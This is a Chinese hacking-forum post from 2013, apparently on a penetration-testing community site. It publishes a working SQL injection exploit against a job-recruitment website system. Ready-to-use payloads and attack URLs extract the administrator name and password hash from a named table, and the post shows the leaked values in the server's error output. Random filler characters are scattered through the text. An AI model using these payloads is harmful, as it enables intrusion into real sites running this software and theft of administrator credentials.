中国网络渗透测试联盟
标题:
网络求职招聘人才网站系统正式版注入
[打印本页]
作者:
admin
时间:
2013-2-16 21:44
标题:
网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp
4 ?5 a" `% r7 v/ O( g; n! J% ~
: s% b b: E* Q4 ]* F$ o2 ]
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
' `/ D/ D* T& s
- Z* n& D1 l) x% U% B# ?
exp:如下
5 a7 W6 Q# J1 q2 Z, D4 `+ a
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
: \3 `6 i2 M3 ?' j2 |
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
}- s% n6 a" c2 M' v# i+ @# R9 X% v
) Q' ?7 w% I6 r! z' |( ^
http://www.xxx.com
/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
; H4 ^5 x. S* D( k
7 L4 m$ d0 ^. ?" I3 a, m: B
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
$ a7 G- y' {' {- |3 l# Z' E7 p* z
2 m# E L8 O. b* _3 n) C a
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
* A0 G1 o6 I" f% L: C" }: ?, r% F
( _! f4 c# X u. w- L/ b6 ~
/Educate/Book_Info.asp,行 8
' K) j( F2 J' q7 u0 d) [# R
( T) ` u' ]' a; t" {
http://www.xxx.com
/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
7 w4 E) \9 V) Z. _" b8 o: o
& r4 M8 d) q7 p3 i _- s+ h) F$ d
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
8 c0 X+ U, q4 T
@+ l, H% {1 I0 T' ?* ^
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
! u$ w# V) Z, h
3 i5 H6 z: ?4 n6 r
/Educate/Book_Info.asp,行 8
. z4 j* Y( ^9 V e
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2